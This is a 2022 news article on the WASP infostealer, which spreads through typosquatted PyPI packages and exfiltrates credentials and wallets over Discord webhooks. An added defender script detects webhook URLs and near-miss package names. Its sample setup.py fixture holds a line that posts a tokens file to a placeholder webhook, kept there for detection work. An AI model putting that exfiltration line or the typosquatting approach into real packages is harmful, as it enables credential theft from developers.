The WASP infostealer used PyPI packages as a vector for attacks

December 2, 2022
WASP Infostealer PyPI Packages Attack Vector Malware

A new cybersecurity campaign is releasing several malicious packages that deliver the WASP infostealer to steal troves of data such as personal information, cryptocurrency, and user credentials from targeted devices.

According to investigations, the latest WASP operation includes capabilities for establishing persistence on an infected machine and bypassing security products. The WASP operators use steganography for obfuscation, polymorphic malware, persistence across reboots, and a fabricated GitHub reputation built with a Starjacking technique.

Researchers reported that the threat actors create legitimate-looking fake user accounts on Steam or GitHub, copying the profile information of well-known accounts or of existing PyPI accounts.

Furthermore, the group registers unclaimed package names that differ from legitimate ones by only minimal changes. Based on their Discord server, the WASP infostealer actors have already infected over a hundred victims.

The WASP infostealer is not selective about what to steal from its victim.

Cybersecurity analysts explained that the WASP infostealer malware could steal all the victim’s Discord accounts, passwords, cryptocurrency wallets, credit card information, and other profitable entities on the victim’s device.

Subsequently, the malware could send the stolen information to its operators via a hard-coded Discord webhook address. Its developers believed their malicious tool was elusive and undetectable to most security solutions. They offer the infostealing malware to other threat groups for $20, but they only accept crypto or gift card payments.
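As an added defender-side example (not code from the article or from any of the researchers it cites), the following Python script checks for two of the indicators described above: a hard-coded Discord webhook URL in package source, and dependency names that sit within one or two edits of a well-known package. The sample setup.py text, the allow-list and the webhook value are constructed placeholders.

```python
import re

# Discord webhook URLs have a fixed shape: a numeric id followed by an opaque token.
WEBHOOK_RE = re.compile(
    r"https?://(?:canary\.|ptb\.)?discord(?:app)?\.com/api/webhooks/\d+/[A-Za-z0-9_-]+"
)

# Constructed sample setup.py text (placeholder values, not a real package).
SAMPLE_SETUP = '''
import requests
HOOK = "https://discord.com/api/webhooks/000000000000000000/EXAMPLE_TOKEN"
requests.post(HOOK, json={"content": open("tokens.txt").read()})
'''

# Hypothetical allow-list of packages the project actually depends on.
KNOWN_PACKAGES = ["requests", "colorama", "pillow"]


def find_webhooks(source: str) -> list[str]:
    """Return every hard-coded Discord webhook URL found in source text."""
    return WEBHOOK_RE.findall(source)


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to spot names one or two keystrokes away."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def suspicious_names(candidates, known=KNOWN_PACKAGES, max_dist=2):
    """Flag candidate names that nearly match a known package but are not it."""
    hits = []
    for name in candidates:
        for good in known:
            d = edit_distance(name.lower(), good.lower())
            if 0 < d <= max_dist:
                hits.append((name, good, d))
    return hits


if __name__ == "__main__":
    print(find_webhooks(SAMPLE_SETUP))
    print(suspicious_names(["requests", "colorsama", "requsts", "numpy"]))
```

Run it against the unpacked contents of a package before installing, and against the names in a requirements file; a webhook hit or a near-miss name is a reason to inspect the package by hand, not proof of compromise.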

In a similar incident, a separate researcher found dozens of newly published PyPI packages delivering the WASP infostealer to Python developers' devices by hiding malicious code inside the packages.

Another group of researchers revealed that several malicious PyPI packages use steganography, image-based code obfuscation, and infection through open-source projects on GitHub.

Security providers struggle to stop the threat actors from abusing PyPI packages, because the actors can instantly create a new identity whenever they suspect researchers have spotted them. Cybersecurity firms should share threat intelligence with one another to protect the open-source landscape from polymorphic malware attacks.
